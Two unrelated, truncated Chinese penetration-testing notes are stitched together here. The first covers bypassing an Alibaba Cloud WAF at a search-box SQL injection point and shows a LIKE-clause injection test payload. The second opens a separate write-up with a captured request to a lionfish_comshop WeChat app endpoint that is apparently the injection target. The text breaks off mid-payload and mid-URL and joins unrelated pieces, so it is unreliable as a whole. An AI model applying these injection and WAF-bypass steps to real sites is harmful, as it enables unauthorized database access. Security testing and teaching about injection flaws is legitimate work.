做个笔记吧,某SQL注入点的绕过,有阿里云waf的. 首先遇到是个搜索框的注入点: 演示下: 针对搜索框,我们的sql语句一般是怎么写的? 本地演示:select * from product where pname like '%华为%' 我们如何进行注入判断? select * from product where pname like '%华为%' and 1=1 and '%%'='%%' select * from product where pname like '%华为%' and
序言 我:摸鱼一时爽,一直摸鱼一时爽啊:relieved:大佬:还摸鱼,快来搞个注入.我:... 拿到数据包 GET /wxapp.php?i=undefined&t=undefined&v=undefined&from=wxapp&c=entry&a=wxapp&do=index&m=lionfish_comshop&sign=9cc540f4c25c15a1a30ae983d9f28c5d&controller=index.loa